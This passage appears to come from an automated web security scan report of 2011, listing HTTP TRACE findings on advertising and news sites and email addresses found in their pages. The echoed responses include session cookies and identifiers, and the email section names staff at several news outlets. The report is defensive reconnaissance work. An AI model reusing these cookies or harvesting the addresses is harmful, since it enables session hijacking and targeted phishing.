X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE

TRACE /errors/405 HTTP/1.1
Host: picasaweb.google.com
Cookie: 815cb55458c58e3b; _rtok=oJqosnvceopT; NID=50=weQTGvlcDANTxV5wF-7ErWL28T_eIde2eHArK6Ro0Zy54tkidlIV7dmvnTL0c6xSXtweleFZDrG22uhTYX0LPoqeazjheLUerXqIXctalXVtgPQlJij9RupAr8rvIdFS; PREF=ID=26ea7fef0a6cf43b:U=f5d01e2b2ce2e5f
...[SNIP]...

23.16. http://pixel.rubiconproject.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /

Request

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: 97a7bf19d725e086

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:02:09 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: 97a7bf19d725e086; rpx=7908%3D14600%2C0%2C1%2C%2C%264940%3D14649%2C0%2C1%2C%2C%265364%3D14653%2C3%2C2%2C%2C%267751%3D14656%2C0%2C1%2C%2C%264210%3D14656%2C1%2C2%2C%2C; put_1994=vf1kj11kp2en; put_2046=WX9qald2TXhCBmNbCwp
...[SNIP]...

23.17. http://r.openx.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://r.openx.net
Path:   /

Request

TRACE / HTTP/1.0
Host: r.openx.net
Cookie: 243ddda595f6b1b5

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:23:26 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: r.openx.net
Cookie: 243ddda595f6b1b5; i=4e28a2c0-3fbe-4680-b440-7249a1d4d410
X-Forwarded-For: 50.23.123.106


23.18. http://rt.legolas-media.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://rt.legolas-media.com
Path:   /

Request

TRACE / HTTP/1.0
Host: rt.legolas-media.com
Cookie: c4243ca34d826fa

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 00:48:42 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: rt.legolas-media.com
Cookie: c4243ca34d826fa; ui=5ea31fa9-d42d-458f-9bb4-1700d69738c0; lgpr=//8=; lgdv12=1; lgdv6=1; lgdv95=1; lgdv73=1; lgtix=BgABADMBSQABADMBHAACADMBDAABADMB/QABADABXwABADMB


23.19. http://sacramentoconnect.sacbee.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sacramentoconnect.sacbee.com
Path:   /

Request

TRACE / HTTP/1.0
Host: sacramentoconnect.sacbee.com
Cookie: 5aa5174ee7e6e059

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:23:34 GMT
Server: Apache/2.2.16 (Amazon)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: sacramentoconnect.sacbee.com
Cookie: 5aa5174ee7e6e059; disqus_reset=Sun%2C%2004%20Sep%202011%2000%3A44%3A40%20GMT; __g_c=c%3A258447044937878%7Cd%3A1%7Ca%3A0%7Cb%3A2%7Ce%3A0.01%7Cf%3A1%7Ch%3A1; __g_u=258447044937878_1_0.01_1_5_1315529080804_1; vmix_core_u
...[SNIP]...

23.20. http://search.spotxchange.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.spotxchange.com
Path:   /

Request

TRACE / HTTP/1.0
Host: search.spotxchange.com
Cookie: f8dfd632d533e9de

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:23:45 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: f8dfd632d533e9de
Host: search.spotxchange.com


23.21. http://shop.sprint.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://shop.sprint.com
Path:   /

Request

TRACE / HTTP/1.0
Host: shop.sprint.com
Cookie: aa829a4429c34dba

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:23:55 GMT
Server: Apache/2.0.52 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: shop.sprint.com
Cookie: aa829a4429c34dba; JSESSIONID=A04BDCEBB4F1F4B037F7C60B1DAAC0CB.shop41; TLisset=true; naf=userSeg~Interstitial Home Page; mbox=check#true#1315097121|session#1315097027971-178294#1315098921|disable#browser%20timeout#1315
...[SNIP]...

23.22. http://tacoda.at.atwola.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tacoda.at.atwola.com
Path:   /

Request

TRACE / HTTP/1.0
Host: tacoda.at.atwola.com
Cookie: 8b4fd72c80730422

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:06:14 GMT
Server: Apache/1.3.37 (Unix) mod_perl/1.29
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Connection: Keep-Alive
Cookie: 8b4fd72c80730422; ANRTT=; TData=99999|^; eadx=x; N=2:b2269f69029173967deb3f16e3a72f92,b2269f69029173967deb3f16e3a72f92; Tsid=0^1315097086^1315100173|17778^1315097086^1315100173; ATTACID=a3Z0aWQ9MTc2NWlmdTFha2tjNzk=; A
...[SNIP]...

23.23. http://tap.rubiconproject.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://tap.rubiconproject.com
Path:   /

Request

TRACE / HTTP/1.0
Host: tap.rubiconproject.com
Cookie: b537cc40e6bf5fd1

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:24:34 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: tap.rubiconproject.com
Cookie: b537cc40e6bf5fd1; SERVERID=; dq=2|2|0|0; put_1994=vf1kj11kp2en; ruid=154e62c97432177b6a4bcd01^1^1315096948^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGD
...[SNIP]...

23.24. http://www.greenbiz.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenbiz.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.greenbiz.com
Cookie: 45467ffa69412153

Response

HTTP/1.0 200 OK
Date: Sun, 04 Sep 2011 01:26:13 GMT
Server: Apache/2.2.15 (EL)
Content-Type: message/http
X-Cache: MISS from localhost
X-Cache-Lookup: NONE from localhost:80
Via: 1.0 localhost:80 (squid/2.6.STABLE21)
Connection: close

TRACE / HTTP/1.0
Host: www.greenbiz.com
Cookie: 45467ffa69412153; SESS2ef9f5808487e67fd7f5219ff19dc8d5=aosfnbumpo2nii8et452rk3r20
Via: 1.0 localhost:80 (squid/2.6.STABLE21)
X-Forwarded-For: 50.23.123.106
Cache-Control: max-age=259200


23.25. http://www.idg.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.idg.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.idg.com
Cookie: bad13e9b08c13128

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Sun, 04 Sep 2011 01:26:15 GMT
Connection: close
Pragma: no-cache
Cache-Control: no-cache
Expires: Sun, 04 Sep 2011 01:26:15 GMT
Content-Type: message/http
Content-Length: 63

TRACE / HTTP/1.0
Host: www.idg.com
Cookie: bad13e9b08c13128

23.26. http://www.newslibrary.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.newslibrary.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.newslibrary.com
Cookie: e01c4eaa80d0886b

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:24 GMT
Server: Apache/1.3.26 (Unix) mod_gzip/1.3.26.1a mod_wsgi/1.0 Python/2.5.1 ApacheJServ/1.1.2 mod_jk/1.2.23
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: e01c4eaa80d0886b; ARCH_HOST=nl.newsbank.com
Host: www.newslibrary.com


23.27. http://www.outbrain.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.outbrain.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.outbrain.com
Cookie: 6835c5cdf7a4d06e

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:26:24 GMT
Server: Apache
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.outbrain.com
Cookie: 6835c5cdf7a4d06e; JSESSIONID=C113375F2DFAFC327F82A45EE5DD9DE1; obuid=7a957d2b-640c-464a-8acd-8219f3607c99; _lvs2="RifDljbBnUo="; _lvd2="a20VgmTZEaeQlaVAQ/tI3Q=="; _rcc2="/RlY4kI4x+EC5hF25OSb5Q=="; recs-854b02c66246fc9
...[SNIP]...

23.28. http://www.sprint.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.sprint.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.sprint.com
Cookie: e08796ab1b345144

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:10:30 GMT
Server: Apache/2.2.14 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: www.sprint.com
Cookie: e08796ab1b345144; Apache=50.23.123.106.1315095419850930; TLisset=true; naf=userSeg~Interstitial Home Page; mbox=check#true#1315097121|session#1315097027971-178294#1315098921|disable#browser%20timeout#1315100658; s_cc=
...[SNIP]...

23.29. https://www.sprint.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.sprint.net
Path:   /

Request

TRACE / HTTP/1.0
Host: www.sprint.net
Cookie: 73a267d793e96c76

Response

HTTP/1.1 200 OK
Set-Cookie: ServerID=1125; path=/
Date: Sun, 04 Sep 2011 01:01:50 GMT
Server: Apache/2.2.4 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Client-IP: 50.23.123.106
Host: www.sprint.net
Cookie: 73a267d793e96c76; ServerID=1125


23.30. http://www.stumbleupon.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.stumbleupon.com
Path:   /

Request

TRACE / HTTP/1.0
Host: www.stumbleupon.com
Cookie: 515e18fc0bea21e2

Response

HTTP/1.1 200 OK
Server: Apache
Vary: Host
Content-Type: message/http
Content-Length: 415
Date: Sun, 04 Sep 2011 01:27:58 GMT
Age: 0
Via: 1.1 varnish
Connection: close

TRACE / HTTP/1.0
Cookie: 515e18fc0bea21e2; su_sid=ZkQhrIC5kRBW4N4C7gQ0mJBfe-9; cmf_i=18719310644e62cb03b4fa21.85125279; cmf_spr=A%2FN; cmf_sp=http%3A%2F%2Fwww.stumbleupon.com%2Fsubmit; su_c=7bc313f708d993657064a32892b775aa%7C%7C10%7C%7C131509
...[SNIP]...

24. Email addresses disclosed
There are 27 instances of this issue:

Issue background

The presence of email addresses within application responses does not necessarily constitute a security vulnerability. Email addresses may appear intentionally within contact information, and many applications (such as web mail) include arbitrary third-party email addresses within their core content.

However, email addresses of developers and other individuals (whether appearing on-screen or hidden within page source) may disclose information that is useful to an attacker; for example, they may represent usernames that can be used at the application's login, and they may be used in social engineering attacks against the organisation's personnel. Unnecessary or excessive disclosure of email addresses may also lead to an increase in the volume of spam email received.

Issue remediation

You should review the email addresses being disclosed by the application, and consider removing any that are unnecessary, or replacing personal addresses with anonymous mailbox addresses (such as helpdesk@example.com).


24.1. http://cdn.echoenabled.com/clientapps/v2/stream.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.echoenabled.com
Path:   /clientapps/v2/stream.js

Issue detail

The following email address was disclosed in the response:

Request

GET /clientapps/v2/stream.js HTTP/1.1
Host: cdn.echoenabled.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Type: application/javascript
Age: 10588
Date: Sun, 04 Sep 2011 00:42:21 GMT
Last-Modified: Fri, 02 Sep 2011 23:49:33 GMT
Content-Length: 115232
Connection: keep-alive


...[SNIP]...
<solutions@aboutecho.com>
...[SNIP]...

24.2. http://cdn.taboolasyndication.com/libtrc/reuters/rbox.en.4-8-2-1-48560.json

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cdn.taboolasyndication.com
Path:   /libtrc/reuters/rbox.en.4-8-2-1-48560.json

Issue detail

The following email address was disclosed in the response:

Request

GET /libtrc/reuters/rbox.en.4-8-2-1-48560.json HTTP/1.1
Host: cdn.taboolasyndication.com
Proxy-Connection: keep-alive
Referer: http://www.reuters.com/article/2011/09/03/us-weather-football-idUSTRE78222D20110903
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/1.0.0
Date: Sun, 04 Sep 2011 00:43:57 GMT
Content-Type: text/plain; charset=UTF-8
Vary: Accept-Encoding
Last-Modified: Thu, 25 Aug 2011 11:22:46 GMT
ETag: "3fd20-284-4ab52a5e8ad80"
Content-Language: en
Accept-Ranges: bytes
Cache-Control: private, max-age=31536000
Age: 825669
Expires: Fri, 24 Aug 2012 11:22:48 GMT
Content-Length: 644
Connection: Keep-Alive

trc_json_locale_data={"rbox":{"":{"MIME-Version":" 1.0","POT-Creation-Date":" 2009-06-03 19:30+0300","X-Poedit-SourceCharset":" utf-8","X-Poedit-Country":" ISRAEL","X-Poedit-Language":" Hebrew","Last-
...[SNIP]...
<info@taboola.com>
...[SNIP]...

24.3. http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1

Summary

Severity:   Information
Confidence:   Certain
Host:   http://content.usatoday.com
Path:   /communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1

Issue detail

The following email addresses were disclosed in the response:

Request

GET /communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1 HTTP/1.1
Host: content.usatoday.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=notre+dame+football&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Date: Sun, 04 Sep 2011 00:42:13 GMT
Content-Length: 48884

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns:pas="http://sitelifestage.usatoday.com/2009/pluckApplicationServer" xmlns:o
...[SNIP]...
<a href="mailto:accuracy@usatoday.com?subject=Blog: Stay updated on Oregon-LSU and other college football action&amp;body=http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-
...[SNIP]...
<a href="mailto:letters@usatoday.com">letters@usatoday.com</a>
...[SNIP]...

24.4. http://i.usatoday.net/asp/uas3/uas.jquery.plugins.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://i.usatoday.net
Path:   /asp/uas3/uas.jquery.plugins.js

Issue detail

The following email address was disclosed in the response:

Request

GET /asp/uas3/uas.jquery.plugins.js HTTP/1.1
Host: i.usatoday.net
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Last-Modified: Wed, 06 Apr 2011 17:56:27 GMT
Accept-Ranges: bytes
ETag: "aaecccf383f4cb1:0"
Server: Microsoft-IIS/7.5
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI"
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:42:19 GMT
Content-Length: 20271
Connection: close

// ColorBox v1.3.9 - a full featured, light-weight, customizable lightbox based on jQuery 1.3
// c) 2009 Jack Moore - www.colorpowered.com - jack@colorpowered.com
// Licensed under the MIT license: http://www.opensource.org/licenses/mit-license.php
(function($,window){var defaults={transition:"elastic",speed:300,width:false,initialWidth:"600",innerWidth:false
...[SNIP]...

24.5. https://login.yahoo.com/config/login

Summary

Severity:   Information
Confidence:   Certain
Host:   https://login.yahoo.com
Path:   /config/login

Issue detail

The following email address was disclosed in the response:

Request

GET /config/login HTTP/1.1
Host: login.yahoo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:50 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
X-Frame-Options: DENY
Cache-Control: private
Vary: Accept-Encoding
Connection: close
Content-Type: text/html
Content-Length: 49854


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>Sign in
...[SNIP]...
<p id='ex'>(e.g. free2rhyme@yahoo.com)</p>
...[SNIP]...

24.6. http://media.charlotteobserver.com/static/scripts/mi/utility_lib.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.charlotteobserver.com
Path:   /static/scripts/mi/utility_lib.js

Issue detail

The following email address was disclosed in the response:

Request

GET /static/scripts/mi/utility_lib.js HTTP/1.1
Host: media.charlotteobserver.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Last-Modified: Fri, 05 Sep 2008 19:38:33 GMT
ETag: "11687e2-3b7c-48c18ab9"
Vary: Accept-Encoding
Server: Apache/1.3.41
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 15228
Cache-Control: max-age=0
Expires: Sun, 04 Sep 2011 00:44:06 GMT
Date: Sun, 04 Sep 2011 00:44:06 GMT
Connection: close

/**
* @fileoverview A random collection of functions, classes and extensions to core
* Javascript objects.
*
* @author Joe Whetzel jwhetzel@mcclatchyinteractive.com
*************************************************************************** */

// extensions to the String object
String.prototype.append = function(str,del){
   var newStr = this;
   if (del) {
       if (n
...[SNIP]...

24.7. http://odb.outbrain.com/utils/get

Summary

Severity:   Information
Confidence:   Certain
Host:   http://odb.outbrain.com
Path:   /utils/get

Issue detail

The following email addresses were disclosed in the response:

Request

GET /utils/get?url=http%3A%2F%2Fcontent.usatoday.com%2Fcommunities%2Fcampusrivalry%2Fpost%2F2011%2F09%2Flive-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state%2F1&settings=true&recs=true&widgetJSId=AR_2&key=AYQHSUWJ8576&idx=0&version=42206&ref=http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dnotre%2Bdame%2Bfootball%26date%3D2011-9-3%26sa%3DX&apv=false&sig=rsi_seg&format=html&rand=88096 HTTP/1.1
Host: odb.outbrain.com
Proxy-Connection: keep-alive
Referer: http://content.usatoday.com/communities/campusrivalry/post/2011/09/live-blog-game-opening-saturday-college-football-lsu-oregon-georgia-boise-state/1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: tick=1315097079013; Domain=outbrain.com; Path=/
P3P: policyref="http://www.outbrain.com/w3c/p3p.xml",CP="NOI NID CURa DEVa TAIa PSAa PSDa OUR IND UNI"
Set-Cookie: _lvs2="RifDljbBnUo="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sun, 30-Sep-2012 00:44:39 GMT; Path=/
Set-Cookie: _lvd2="a20VgmTZEaeQlaVAQ/tI3Q=="; Version=1; Domain=outbrain.com; Max-Age=564480; Expires=Sat, 10-Sep-2011 13:32:39 GMT; Path=/
Set-Cookie: _rcc2="/RlY4kI4x+EC5hF25OSb5Q=="; Version=1; Domain=outbrain.com; Max-Age=33868800; Expires=Sun, 30-Sep-2012 00:44:39 GMT; Path=/
Set-Cookie: recs-1ac7243e27be1904dc4b28c0c3b41b7f="5sHw/4cdKR1RBwoxQ+NK56Gt39jPhS7BtAFn45s7nNxBJBStyd24vYRw03xty00LSHEMw5NUdblMWfcjIdzz7o0VClIcP3suYYfuX/vSYbkv2mx6/RuYBJJtD16TCm5FO5dLo73fEkx5WOXcO9UcZQ=="; Version=1; Domain=outbrain.com; Max-Age=300; Expires=Sun, 04-Sep-2011 00:49:39 GMT; Path=/
Content-Type: text/x-json;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 00:44:38 GMT
Content-Length: 15137

var ob_clbk=(typeof(OBR.extern)==='undefined')?outbrain:OBR.extern;ob_clbk.returnedHtmlData({"response":{"html":"\u003cdiv class\u003d\"ob_dual_container AR_2\"\u003e\n \u003cspan class\u003d\"ob_em
...[SNIP]...
\u0026utm_medium\u003dwhatsthis\u0026utm_campaign\u003dvistlink\\\u0027 target\u003d\\\u0027_blank\\\u0027\u003eoutbrain.com\u003c/a\u003e. We welcome your feedback at \u003ca href\u003d\\\u0027mailto:feedback@outbrain.com\\\u0027\u003efeedback@outbrain.com\u003c/a\u003e. View our \u003ca href\u003d\\\u0027http://www.outbrain.com/privacy?utm_source\u003dwidget\u0026utm_medium\u003dwhatsthis\u0026utm_campaign\u003dprivacy\\\u0027 target\u003d\\\u0027_blan
...[SNIP]...

24.8. https://subscriberservices.mcclatchy.com/char/transactiontype.asp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://subscriberservices.mcclatchy.com
Path:   /char/transactiontype.asp

Issue detail

The following email addresses were disclosed in the response:

Request

GET /char/transactiontype.asp HTTP/1.1
Host: subscriberservices.mcclatchy.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Sun, 04 Sep 2011 01:24:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Length: 15086
Content-Type: text/html
Cache-control: private


<html>
<head>
   <LINK rel="stylesheet" type="text/css" href="SSheet1.css">
   <TITLE></TITLE>
<script LANGUAGE="JavaScript">
function WM_netscapeCssFix()
{
/*
Source: Webmonkey Code Library
(http://www.hotwired.com/webmonkey/javascript/code_library/)

Author: Taylor
Author Email: taylor@wired.com
Author URL: http://www.taylor.org/
*/

// This part was inspired by Matthew_Baird@wayfarer.com
// It gets around another unfortunate bug whereby Netscape
// fires a resize event when the scrollbars pop up. This
// checks to make sure that the window's available size
// has actual
...[SNIP]...

24.9. http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charlotteobserver.com
Path:   /2011/09/03/2577566/raceday-danica-already-gone.html

Issue detail

The following email address was disclosed in the response:

Request

GET /2011/09/03/2577566/raceday-danica-already-gone.html HTTP/1.1
Host: www.charlotteobserver.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/trends/hottrends?q=sprint&date=2011-9-3&sa=X
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 110282
Expires: Sun, 04 Sep 2011 01:00:13 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:00:13 GMT
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://ogp.me/ns#">

...[SNIP]...
<br>jutter@charlotteobserver.com</div>
...[SNIP]...
<span class="org fn">
jutter@charlotteobserver.com
</span>
...[SNIP]...
/www.charlotteobserver.com/2011/09/03/2577566_raceday-danica-already-gone.html';
mistats.popstoryheadline='2577566|Raceday: Danica already gone?';
mistats.contentsource='charlotteobserver|Manual Entry|jutter@charlotteobserver.com|&#8236;By Jim Utter&#8237;';
mistats.pubdate='2011/09/03';
mistats.moddate='2011/09/03 H20';


-->
...[SNIP]...

24.10. http://www.charlotteobserver.com/advertising/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.charlotteobserver.com
Path:   /advertising/index.html

Issue detail

The following email addresses were disclosed in the response:

Request

GET /advertising/index.html HTTP/1.1
Host: www.charlotteobserver.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache/1.3.41
Content-Type: text/html
Expires: Sun, 04 Sep 2011 01:25:42 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 01:25:42 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 91622

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://ogp.me/ns#">

...[SNIP]...
<a href="mailto:advertise@charlotteobserver.com">advertise@charlotteobserver.com</a>
...[SNIP]...
<a href="mailto:drgordon@charlotteobserver.com">
...[SNIP]...
<a href="mailto:dfrank@charlotteobserver.com">
...[SNIP]...
<a href="mailto:dfrank@charlotteobserver.com">dfrank@charlotteobserver.com</a>
...[SNIP]...
<a href="mailto:adevereaux@charlotteobserver.com">
...[SNIP]...
<a href="mailto:eirwin@charlotteobserver.com">
...[SNIP]...
<a href="mailto:drgordon@charlotteobserver.com">
...[SNIP]...
<a href="mailto:dfrank@charlotteobserver.com">
...[SNIP]...
<a href="mailto:jmarco@charlotteobserver.com">
...[SNIP]...
<a href="mailto:rstokes@charlotteobserver.com">
...[SNIP]...

24.11. http://www.freep.com/article/20110903/SPORTS07/109030443/Other-Michigan-State-athletes-fans-cheer-football

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freep.com
Path:   /article/20110903/SPORTS07/109030443/Other-Michigan-State-athletes-fans-cheer-football

Issue detail

The following email address was disclosed in the response:

Request

GET /article/20110903/SPORTS07/109030443/Other-Michigan-State-athletes-fans-cheer-football HTTP/1.1
Host: www.freep.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM"
Last-Modified: Sun, 04 Sep 2011 01:26:09 GMT
X-Processing-begin: MOC-WN0324, on site C4 (2011-09-03 21:26:09:818)
Content-Type: text/html
X-Processing-finished: MOC-WN0324, on site C4 (2011-09-03 21:26:09:943)
Content-Type: text/html; charset=iso-8859-1
Date: Sun, 04 Sep 2011 01:26:10 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 181668

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
